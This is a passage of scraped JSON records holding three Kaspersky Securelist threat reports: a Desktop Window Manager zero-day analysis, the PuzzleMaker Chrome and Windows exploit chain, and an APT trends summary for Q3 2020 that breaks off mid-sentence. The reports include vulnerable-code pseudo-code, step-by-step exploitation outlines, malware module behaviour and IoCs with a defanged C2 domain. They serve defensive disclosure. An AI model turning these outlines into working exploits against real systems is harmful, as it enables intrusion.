(1)\tstorageOffset == this->properties[propertyId]->offset & 0x1FFFFFFF\n (2)\tthis->properties[propertyId]->type == type\n\n_**Conditions which need to be met for exploitation in dwmcore.dll**_\n\nThese checks could be bypassed if an attacker is able to allocate and release objects in the dwm.exe process to groom heap into the desired state and spray memory at specific locations with fake properties. The discovered exploit manages to do this using the CreateResource, ReleaseResource and SetResourceBufferProperty commands.\n\nAt the time of writing, we still hadn't analyzed the updated binaries that are fixing this vulnerability, but to exclude the possibility of other variants for this vulnerability Microsoft would need to check the count of properties for other expression types as well.\n\nEven with the above issues in dwmcore.dll, if the desired memory state is achieved to bypass the previously mentioned checks and a batch of commands are issued to trigger the vulnerability, it still won't be triggered because there is one more thing preventing it from happening.\n\nAs mentioned above, commands are first processed by the kernel and only after that are they sent to Desktop Window Manager (dwm.exe). This means that if you try to send a command with an invalid propertyId, NtDCompositionProcessChannelBatchBuffer syscall will return an error and the command will not be passed to the dwm.exe process. SetResourceBufferProperty commands with expression type set to D2DVector2 are processed in the win32kbase.sys driver with the functions DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(\u2026) and DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(\u2026), which are very similar to those present in dwmcore.dll (it's quite likely they were copy-pasted). However, the kernel version of the UpdateProperty<D2DVector2> function has one notable difference \u2013 it actually checks the count of properties added to the resource.\n \n \n int DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(DirectComposition::CPropertySetMarshaler *this, unsigned int *commandParams, _QWORD *value)\n {\n unsigned int propertyId = commandParams[0];\n unsigned int storageOffset = commandParams[1];\n unsigned int type = commandParams[2];\n \n if ( propertyId >= this->propertiesCount\n || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF)\n || type != this->properties[propertyId]->type )\n {\n return 0xC000000D;\n }\n else\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n ...\n }\n return 0;\n }\n\n_**DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(\u2026) in win32kbase.sys**_\n\nThe check for propertiesCount in the kernel mode version of the UpdateProperty<D2DVector2> function prevents further processing of a malicious command by its user mode twin and mitigates the vulnerability, but this is where DirectComposition::CPropertySetMarshaler::AddProperty<D2DVector2>(\u2026) comes in to play. The kernel version of the AddProperty<D2DVector2> function works exactly like its user mode variant and it also applies the same behavior of checking property after it has already been added and returns an error if propertyId and storageOffset of the created property do not match the provided values. Because of this, it's possible to use the AddProperty<D2DVector2> function to add a new property and force the function to return an error and cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode. The propertiesCount check in the kernel could be bypassed this way and malicious commands would be passed to Desktop Window Manager (dwm.exe).\n\nInconsistency between the number of properties assigned to the same resource in kernel mode/user mode could be a source of other vulnerabilities, so we recommend Microsoft to change the behavior of the AddProperty function and check properties before they are added.\n\nThe whole exploitation process for the discovered exploit is as follows:\n\n 1. Create a large number of resources with properties of specific size to get heap into predictable state.\n 2. Create additional resources with properties of specific size and content to spray memory at specific locations with fake properties.\n 3. Release resources created at stage 2.\n 4. Create additional resources with properties. These resources will be used to perform OOB writes.\n 5. Make holes among resources created at stage 1.\n 6. Create additional properties for resources created at stage 4. Their buffers are expected to be allocated at specific locations.\n 7. Create "special" properties to cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode for resources created at stage 4.\n 8. Use OOB write vulnerability to write shellcode, create an object and get code execution.\n 9. Inject additional shellcode into another system process.\n\nKaspersky products detect this exploit with the verdicts:\n\n * HEUR:Exploit.Win32.Generic\n * HEUR:Trojan.Win32.Generic\n * PDM:Exploit.Win32.Generic", "cvss3": {}, "published": "2021-04-13T17:35:50", "type": "securelist", "title": "Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-0797", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2021-04-13T17:35:50", "id": "SECURELIST:A3D3514100806269750A23D748D34C59", "href": "https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:02", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21111141/abstract_blur_code-990x400.jpg)\n\nOn April 14-15, 2021, Kaspersky technologies detected a wave of highly targeted attacks against multiple companies. Closer analysis revealed that all these attacks exploited a chain of Google Chrome and Microsoft Windows zero-day exploits. While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges.\n\nThe elevation of privilege exploit was fine-tuned to work against the latest and most prominent builds of Windows 10 (17763 - RS5, 18362 - 19H1, 18363 - 19H2, 19041 - 20H1, 19042 - 20H2) and it exploits two distinct vulnerabilities in the Microsoft Windows OS kernel. On April 20, 2021, we reported these vulnerabilities to Microsoft and they assigned CVE-2021-31955 to the information disclosure vulnerability and CVE-2021-31956 to the elevation of privilege vulnerability. Both vulnerabilities were patched on June 8, 2021, as a part of the June Patch Tuesday.\n\n## Remote code execution exploit\n\nAll of the observed attacks were conducted through Chrome browser. Unfortunately, we were unable to retrieve the JavaScript with full exploit code, but the timeframe of attacks and events preceding it led us to suspect one particular vulnerability.\n\nOn April 6-8, 2021 the Pwn2Own competition took place. This is a computer hacking contest where the Google Chrome web browser was one of the targets. According to the ZDI (Zero Day Initiative, the organizer of Pwn2Own) [website](<https://www.zerodayinitiative.com/blog/2021/4/2/pwn2own-2021-schedule-and-live-results>), one participating team was able to demonstrate a successful exploitation of the Chrome renderer process using a Typer Mismatch bug.\n\nOn April 12, 2021, the developers of Chromium committed two (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>), issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>)) Typer-related bug fixes to the open-source repository of V8 \u2013 a JavaScript engine used by Chrome and Chromium web browsers. One of these bug fixes (issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>)) was intended to patch a vulnerability that was used during Pwn2Own, and both bug fixes were committed together with regression tests \u2013 JavaScript files to trigger these vulnerabilities. Later on the same day, a user with the Twitter handle @r4j0x00 published a working remote code execution exploit on GitHub, targeting an up-to-date version of Google Chrome. That exploit used a vulnerability from issue [1196683](<https://chromium-review.googlesource.com/c/v8/v8/+/2820971>) to execute a shellcode in the context of the browser renderer process.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122836/PuzzleMaker_attacks_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122836/PuzzleMaker_attacks_01.png>)\n\n**_Screenshot of tweet with Chrome zero-day published on April 12, 2021_**\n\nThe published exploit didn't contain a sandbox escape exploit and was therefore intended to work only when the browser was launched with the command line option _-no-sandbox_.\n\nOn April 13, 2021, Google released Chrome update 89.0.4389.128 for Windows, Mac and Linux with a fix for two vulnerabilities; CVE-2021-21220 (used during Pwn2Own) was one of them.\n\nSome of our customers who were attacked on April 14-15, 2021, already had their Chrome browser updated to 89.0.4389.128, and that's why we think the attackers didn't use CVE-2021-21220 in their attacks.\n\nOn April 14, 2021, Google released Chrome update 90.0.4430.72 for Windows, Mac and Linux with a fix for 37 vulnerabilities. On the same day, a new Chrome exploit was presented to the public.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122912/PuzzleMaker_attacks_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122912/PuzzleMaker_attacks_02.png>)\n\n**_Screenshot of GitHub repository with Chrome zero-day published on April 14, 2021_**\n\nThis newly published exploit used a vulnerability from issue [1195777](<https://chromium-review.googlesource.com/c/v8/v8/+/2817791>), worked on the newly released Chrome 90.0.4430.72, and was fixed as CVE-2021-21224 only a few days later, on April 20, 2021.\n\nWe suspect the attackers were also able to use this JavaScript file with regression test to develop the exploit (or acquire it from someone else) and were probably using CVE-2021-21224 in their attacks.\n\n## Elevation of privilege exploit\n\nCVE-2021-31955 is an information disclosure vulnerability in ntoskrnl.exe. The vulnerability is affiliated with a Windows OS feature called SuperFetch. It was introduced in Windows Vista and is aimed to reduce software loading times by pre-loading commonly used applications into memory. For SuperFetch purposes the function _NtQuerySystemInformation_ implements a special system information class _SystemSuperfetchInformation_. This system information class incorporates more than a dozen of different SuperFetch information classes. The vulnerability lies in the fact that data returned by the _NtQuerySystemInformation_ function for the SuperFetch information class _SuperfetchPrivSourceQuery_ contains EPROCESS kernel addresses for currently executed processes.\n\nIt's noteworthy that this vulnerability can be observed in code that was available on [GitHub](<https://github.com/zodiacon/WindowsInternals/blob/master/MemInfo/MemInfo.cpp>) for a few years before we caught it in the wild and Microsoft patched it.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122949/PuzzleMaker_attacks_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/07122949/PuzzleMaker_attacks_03.png>)\n\n**_CVE-2021-31955 can be observed in the source code of the MemInfo utility_**\n\nThe other vulnerability, CVE-2021-31956, is a heap-based buffer overflow in ntfs.sys. The function _NtfsQueryEaUserEaList_ processes a list of extended attributes for the file and stores the retrieved values to buffer. This function is accessible via _ntoskrnl_ syscall and among other things it's possible to control the size of the output buffer. If the size of the extended attribute is not aligned, the function will calculate a padding and the next extended attribute will be stored 32-bit aligned. The code checks if the output buffer is long enough to fit the extended attribute with padding, but it doesn't check for possible integer-underflow. As a result, a heap-based buffer overflow can happen.\n \n \n for ( cur_ea_list_entry = ea_list; ; cur_ea_list_entry = next_ea_list_entry )\n {\n ...\n \n out_buf_pos = (DWORD *)(out_buf + padding + occupied_length);\n \n if ( NtfsLocateEaByName(eas_blocks_for_file, eas_blocks_size, &name, &ea_block_pos) )\n {\n \tea_block = eas_blocks_for_file + ea_block_pos;\n \tea_block_size = ea_block->DataLength + ea_block->NameLength + 9;\n \tif ( ea_block_size <= out_buf_length - padding ) // integer-underflow is possible\n \t{\n \tmemmove(out_buf_pos, (const void *)ea_block, ea_block_size); // heap buffer overflow\n \t*out_buf_pos = 0;\n \t}\n }\n else\n {\n \t...\n }\n \n ...\n \n occupied_length += ea_block_size + padding;\n out_buf_length -= ea_block_size + padding;\n padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;\n \n ...\n }\n\n**_Pseudo-code for vulnerable code in function NtfsQueryEaUserEaList_**\n\nThe exploit uses CVE-2021-31956 along with Windows Notification Facility (WNF) to create arbitrary memory read and write primitives. We are planning to publish more information about this technique in the future.\n\nAs the exploit uses CVE-2021-31955 to get the kernel address of the EPROCESS structure, it is able to use the common post exploitation technique to steal SYSTEM token. However, the exploit uses a rarely used "PreviousMode" technique instead. We have seen this technique used by the CHAINSHOT framework and even made a [presentation](<https://github.com/oct0xor/presentations/blob/master/2019-02-Overview%20of%20the%20latest%20Windows%20OS%20kernel%20exploits%20found%20in%20the%20wild.pdf>) about it at CanSecWest/BlueHat in 2019. The exploit uses this technique to inject a malware module into the system process and execute it.\n\n## Malware modules\n\nBesides the aforementioned exploits, the full attack chain consists of four additional malware modules, which will be referred to as:\n\n * Stager\n * Dropper\n * Service\n * Remote shell\n\nThe stager module is used to notify that exploitation was successful. It also downloads and executes a more complex malware dropper module from a remote server. Each stager module is delivered to the victim with a personalized configuration blob that defines the C&C URL, Session ID, keys to decrypt the next stage of malware, and other information.\n\nAll the stager module samples that we've discovered so far were configured to use the same URL address \u2013 hxxps://p{removed}/metrika_upload/index.php \u2013 to download the encrypted malware dropper module.\n\nWe believe there is a chance that the remote code execution JavaScript exploit was also hosted on the same legitimate-looking geopolitical news portal, but we found no evidence of a classic watering hole attack. The victimology suggests a highly targeted delivery of exploits.\n\nThe dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack. We couldn't find any similarities between this and other known malware.\n\nThe remote shell module has a hardcoded URL of the C&C server inside (media-seoengine[.]com). All the communication between C&C server and client is authorized and encrypted. The remote shell module is able to download and upload files, create processes, sleep for specified amounts of time and delete itself from the compromised machine.\n\nNone of the artifacts we analyzed appear to have strong connections to any known threat actors. The only similarity to CHAINSHOT we observed is the "PreviousMode" technique, although this is publicly known and may be used by various groups. We are calling the threat actor behind these attacks PuzzleMaker.\n\nKaspersky products detect this exploit and malware modules with the verdicts:\n\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * UDS:DangerousObject.Multi.Generic\n\nKaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected many zero-days, repeatedly proving their effectiveness. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.\n\nMore information about these attacks and the actor behind them is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports@kaspersky.com.\n\nKaspersky would like to thank Microsoft for their prompt analysis of the report and patches.\n\n## IoCs\n\nmedia-seoengine[.]com\n\n**%SYSTEM%\\WmiPrvMon.exe**\n\nMD5 [09A5055DB44FC1C9E3ADD608EFFF038C](<https://opentip.kaspersky.com/09A5055DB44FC1C9E3ADD608EFFF038C/>) \nSHA-1 [BFFA4462901B74DBFBFFAA3A3DB27DAA61211412](<https://opentip.kaspersky.com/BFFA4462901B74DBFBFFAA3A3DB27DAA61211412/>) \nSHA-256 [982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9](<https://opentip.kaspersky.com/982F7C4700C75B81833D5D59AD29147C392B20C760FE36B200B541A0F841C8A9/>)\n\n**%SYSTEM%\\wmimon.dll**\n\nMD5 [D6B850C950379D5EE0F254F7164833E8](<https://opentip.kaspersky.com/D6B850C950379D5EE0F254F7164833E8/>) \nSHA-1 [E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B](<https://opentip.kaspersky.com/E63ED3B56A5F9A1EA5C92D3D2444196EA13BE94B/>) \nSHA-256 [8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6](<https://opentip.kaspersky.com/8A17279BA26C8FBE6966EA3300FDEFB1ADAE1B3ED68F76A7FC81413BD8C1A5F6/>)", "cvss3": {}, "published": "2021-06-08T17:32:30", "type": "securelist", "title": "PuzzleMaker attacks with Chrome zero-day exploit chain", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21224", "CVE-2021-31955", "CVE-2021-31956"], "modified": "2021-06-08T17:32:30", "id": "SECURELIST:8E9198BF0E389572981DD1AA05D0708A", "href": "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/21082144/abstract-digital-yellow-990x400.jpeg)\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seek directories that exist only in Cyrilic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here ](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such (COVID-19) to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, MosiacRegressor UEFI 